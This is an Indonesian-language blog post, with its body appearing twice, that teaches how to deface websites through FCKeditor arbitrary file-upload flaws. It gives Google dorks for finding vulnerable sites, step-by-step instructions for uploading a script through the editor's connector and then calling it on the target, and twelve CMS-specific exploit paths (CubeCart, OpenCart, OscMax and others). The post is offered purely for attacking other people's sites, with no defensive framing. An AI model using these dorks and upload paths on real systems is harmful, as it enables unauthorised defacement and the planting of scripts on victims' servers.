Deface Fckeditor
Assalamu'alaikum wr.wb
Oke langsung saja dengen teknik deface fckeditor
Seperti biasa Dorking dulu di mas Google yang setia melayani 😂
Dork:
inurl:editor/filemanager/upload
Exploit: test.html
atau Dork dan Exploit d gabung jadi satu
juga bisa, biar langung di arahkan ke
upload file
Contoh: inurl:editor/filemanager/upload/
test.html
tapi INGAT !!
tidak semua Dork dan Exploit
bisa di gabungkan
Bila sudah menemukan web yg vuln
langsung klik ASP di pojok kiri atas di
ganti PHP dan klik pilih file dan send it to server
Bila muncul text klik oke
itu tandanya file script berhasil di unggah
dan copy url scriptnya dan pastekan di
belakang web target
Contoh: sitetarget.co.li/url script anda
Dan biar langkahnya lebih mudah gunakan exploit ini:
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Dan cara manggil scriptnya
Sitetarget.co.li/files/namascriptkamu.html
Gampangkan ???......
Dan di bawah ini masih ada beberapa teknik fckeditor ... Selamat Berimajinasi 😂
1. Powered CubeCart Adalah module
Deface Upload file, kita bisa
menggunakan cara ini.
Dork: Powered By CubeCart V 3.0
Exploit: /admin/includes/rte/editor/
filemanager/browser/default/connectors/
test.html
Contoh: www.target.com/admin/includes/
rte/editor/filemanager/browser/default/
connectors/test.html
2. Powered By OpenCart
Dork: Powered By OpenCart
Exploit: admin/view/javascript/fckeditor/
editor/filemanager/connectors/test.html
Contoh: www.target.com/admin/view/
javascript/fckeditor/editor/filemanager/
connectors/test.html
3. Powered By OscMax V 2.0
Dork: Powered By OscMax V 2.0
Exploit: FCKeditor/editor/filemanager/
browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/
editor/filemanager/browser/default/
connectors/test.html
4. Hacking TXt. Hacking Txt ini sama saja
dengan Konsep 3 di atas it, cuma bedany
khusus fiile txt saja yg bisa di upload,
bentuk file lain tdk akan mnerima
Dork: Inurl:/FCKeditor/editor/filemanager/
Exploit: /FCKeditor/editor/filemanager/
browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/
editor/filemanager/browser/default/
connectors/test.html
5. GIOI PHANG (fckeditor) Arbitrary File
Upload Vulnerability
Dork: intext:Powered (+) Designed THE
GIOI PHANG Ltd.
Exploit: http://www.site.com//editor/
filemanager/connectors/uploadtest.html
6. Cms Liquid Bubble - Fckeditor -
Vulnerablity
Dork: "Web design London: Liquid Bubble "
Exploit: http://www.site.com/editor/editor/filemanager/connectors/uploadtest.html
7. Webfactory n&p CMS (fckeditor)
Arbitrary File Upload Vulnerability
Dork: inurl:pcms/content
Dork: by webfactory n&p
Exploit: http://www.site.com/[path]/
admin/fckeditor/editor/filemanager/
connectors/uploadtest.html
8. Izrada (fckeditor) Arbitrary File UploadVulnerability
Dork: intext:izrada web stranica: I.T.B.
Exploit: http://www.site.com/fckeditor/
editor/filemanager/connectors/
uploadtest.html
9. CMS Thea (fckeditor) Arbitrary File
Upload Vulnerability
Dork: Designed by C.P.U. ZETO w Jeleniej
Grze
Exploit: http://www.site.com/js/fckeditor/
editor/filemanager/connectors/
uploadtest.html
10. NETVIDADE CMS (FCKEDITOR)
Arbitrary File Upload Vulnerability
Dork: "Desenvolvido por netvidade.com"
Exploit: http://www.site.com/plugins/
fckeditor/editor/filemanager/connectors/
uploadtest.html
11. Wordocs Israel FCKeditor Shell Upload
Disclosure Vulnerabilities
Dork: inurl:/files/wordocs/ site:il
Exploit: /FCKeditor/editor/plugins/
uploadme/fck_uploadme.php
12. FCKEDITOR
Dork: inurl:advert_detail.php?id=
Exploit: http://www.site.co.li /admin/
FCKeditor/editor/filemanager/browser/
default/browser.html?
Type=File&Connector=connectors/php/
connector.php
Demikian yang dapat saya sampaikan
Kurang lebihnya mohon maaf
Sekian dan terima kasih
ttd: Jl_sutra
https://www.youtube.com/channel/UCFH6CnetBOuIJgnL5v8ySpQ
Silahkan kunjungi Channel Youtube sohib saya
Dan jangan lupa Like and Subcribe ya mastah 👻👻👻
Wassalamu'alaikum wr.wb_
Oke langsung saja dengen teknik deface fckeditor
Seperti biasa Dorking dulu di mas Google yang setia melayani 😂
Dork:
inurl:editor/filemanager/upload
Exploit: test.html
atau Dork dan Exploit d gabung jadi satu
juga bisa, biar langung di arahkan ke
upload file
Contoh: inurl:editor/filemanager/upload/
test.html
tapi INGAT !!
tidak semua Dork dan Exploit
bisa di gabungkan
Bila sudah menemukan web yg vuln
langsung klik ASP di pojok kiri atas di
ganti PHP dan klik pilih file dan send it to server
Bila muncul text klik oke
itu tandanya file script berhasil di unggah
dan copy url scriptnya dan pastekan di
belakang web target
Contoh: sitetarget.co.li/url script anda
Dan biar langkahnya lebih mudah gunakan exploit ini:
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Dan cara manggil scriptnya
Sitetarget.co.li/files/namascriptkamu.html
Gampangkan ???......
Dan di bawah ini masih ada beberapa teknik fckeditor ... Selamat Berimajinasi 😂
1. Powered CubeCart Adalah module
Deface Upload file, kita bisa
menggunakan cara ini.
Dork: Powered By CubeCart V 3.0
Exploit: /admin/includes/rte/editor/
filemanager/browser/default/connectors/
test.html
Contoh: www.target.com/admin/includes/
rte/editor/filemanager/browser/default/
connectors/test.html
2. Powered By OpenCart
Dork: Powered By OpenCart
Exploit: admin/view/javascript/fckeditor/
editor/filemanager/connectors/test.html
Contoh: www.target.com/admin/view/
javascript/fckeditor/editor/filemanager/
connectors/test.html
3. Powered By OscMax V 2.0
Dork: Powered By OscMax V 2.0
Exploit: FCKeditor/editor/filemanager/
browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/
editor/filemanager/browser/default/
connectors/test.html
4. Hacking TXt. Hacking Txt ini sama saja
dengan Konsep 3 di atas it, cuma bedany
khusus fiile txt saja yg bisa di upload,
bentuk file lain tdk akan mnerima
Dork: Inurl:/FCKeditor/editor/filemanager/
Exploit: /FCKeditor/editor/filemanager/
browser/default/connectors/test.html
Contoh: www.target.com/FCKeditor/
editor/filemanager/browser/default/
connectors/test.html
5. GIOI PHANG (fckeditor) Arbitrary File
Upload Vulnerability
Dork: intext:Powered (+) Designed THE
GIOI PHANG Ltd.
Exploit: http://www.site.com//editor/
filemanager/connectors/uploadtest.html
6. Cms Liquid Bubble - Fckeditor -
Vulnerablity
Dork: "Web design London: Liquid Bubble "
Exploit: http://www.site.com/editor/editor/filemanager/connectors/uploadtest.html
7. Webfactory n&p CMS (fckeditor)
Arbitrary File Upload Vulnerability
Dork: inurl:pcms/content
Dork: by webfactory n&p
Exploit: http://www.site.com/[path]/
admin/fckeditor/editor/filemanager/
connectors/uploadtest.html
8. Izrada (fckeditor) Arbitrary File UploadVulnerability
Dork: intext:izrada web stranica: I.T.B.
Exploit: http://www.site.com/fckeditor/
editor/filemanager/connectors/
uploadtest.html
9. CMS Thea (fckeditor) Arbitrary File
Upload Vulnerability
Dork: Designed by C.P.U. ZETO w Jeleniej
Grze
Exploit: http://www.site.com/js/fckeditor/
editor/filemanager/connectors/
uploadtest.html
10. NETVIDADE CMS (FCKEDITOR)
Arbitrary File Upload Vulnerability
Dork: "Desenvolvido por netvidade.com"
Exploit: http://www.site.com/plugins/
fckeditor/editor/filemanager/connectors/
uploadtest.html
11. Wordocs Israel FCKeditor Shell Upload
Disclosure Vulnerabilities
Dork: inurl:/files/wordocs/ site:il
Exploit: /FCKeditor/editor/plugins/
uploadme/fck_uploadme.php
12. FCKEDITOR
Dork: inurl:advert_detail.php?id=
Exploit: http://www.site.co.li /admin/
FCKeditor/editor/filemanager/browser/
default/browser.html?
Type=File&Connector=connectors/php/
connector.php
Demikian yang dapat saya sampaikan
Kurang lebihnya mohon maaf
Sekian dan terima kasih
ttd: Jl_sutra
https://www.youtube.com/channel/UCFH6CnetBOuIJgnL5v8ySpQ
Silahkan kunjungi Channel Youtube sohib saya
Dan jangan lupa Like and Subcribe ya mastah 👻👻👻
Wassalamu'alaikum wr.wb_
Komentar
Posting Komentar
Silahkan komentar yang sopan (h)